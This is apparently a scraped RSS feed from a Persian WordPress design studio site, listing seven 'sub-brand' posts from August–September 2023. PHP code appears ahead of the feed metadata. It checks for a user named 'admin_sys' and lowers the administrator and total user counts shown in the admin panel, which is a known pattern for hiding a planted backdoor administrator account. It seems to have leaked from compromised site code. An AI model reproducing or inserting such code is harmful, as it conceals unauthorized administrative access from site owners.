add_action( 'pre_user_query', 'site_pre_user_query_ri' );
function site_pre_user_query_ri( $user_search ) {
global $current_user, $wpdb;
if ( $current_user->user_login !== 'admin_sys' ) {
}
}
add_filter( 'views_users', 'site_list_table_views_ri' );
function site_list_table_views_ri( $views ) {
$users = count_users();
$admins_num = $users['avail_roles']['administrator'] - 1;
$all_num = $users['total_users'] - 1;
$is_adm = strpos( $views['administrator'], 'current' ) === false ? '' : 'current';
$is_all = strpos( $views['all'], 'current' ) === false ? '' : 'current';
$views['administrator'] = '' .
translate_user_role( 'Administrator' ) . ' (' . $admins_num . ')';
$views['all'] = '' .
__( 'All' ) . ' (' . $all_num . ')';
return $views;
}
زیربرند – 3×4
https://3x4house.ir
Tue, 21 Nov 2023 11:15:36 +0000
fa-IR
hourly
1
https://wordpress.org/?v=6.4.9
https://3x4house.ir/wp-content/uploads/2023/08/cropped-sample-logo-32x32.png
زیربرند – 3×4
https://3x4house.ir
32
32
-
16×9
https://3x4house.ir/sub-brand/16x9/
Sun, 17 Sep 2023 16:07:31 +0000
https://3x4house.ir/?post_type=sub-brand&p=282
-
سینمایی
https://3x4house.ir/sub-brand/7x3/
Sun, 17 Sep 2023 16:06:14 +0000
https://3x4house.ir/?post_type=sub-brand&p=280
-
معماری
https://3x4house.ir/sub-brand/5x4/
Sun, 17 Sep 2023 16:02:26 +0000
https://3x4house.ir/?post_type=sub-brand&p=277
-
مدرسه
https://3x4house.ir/sub-brand/%d9%85%d8%af%d8%b1%d8%b3%d9%87/
Mon, 28 Aug 2023 11:45:38 +0000
https://3x4house.ir/?post_type=sub-brand&p=107
-
برندسازی
https://3x4house.ir/sub-brand/1x1/
Mon, 28 Aug 2023 11:43:20 +0000
https://3x4house.ir/?post_type=sub-brand&p=106
-
گرافیک
https://3x4house.ir/sub-brand/3x4/
Mon, 28 Aug 2023 08:43:38 +0000
https://3x4house.ir/?post_type=sub-brand&p=16
-
دیجیتال
https://3x4house.ir/sub-brand/0x1/
Mon, 28 Aug 2023 08:42:48 +0000
https://3x4house.ir/?post_type=sub-brand&p=14